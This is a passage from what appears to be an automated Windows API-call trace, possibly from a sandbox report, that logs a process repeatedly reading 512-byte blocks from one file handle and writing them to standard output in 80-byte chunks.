lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.789] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.789] ReadFile 
(in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] GetFileType (hFile=0x50) returned 0x1 [0212.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.789] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.790] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.790] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, 
lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.790] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, 
lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.791] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.791] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] GetFileType (hFile=0x50) returned 0x1 [0212.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.791] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, 
lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.792] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.792] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0212.792] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.792] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] 
GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.793] GetFileType (hFile=0x50) returned 0x1 [0212.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.794] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.794] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | 
out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] GetFileType (hFile=0x50) returned 0x1 [0212.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.794] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, 
lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.795] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.795] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 
[0212.795] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] GetFileType (hFile=0x50) returned 0x1 [0212.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.795] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.796] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) 
returned 1 [0212.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.796] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.796] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, 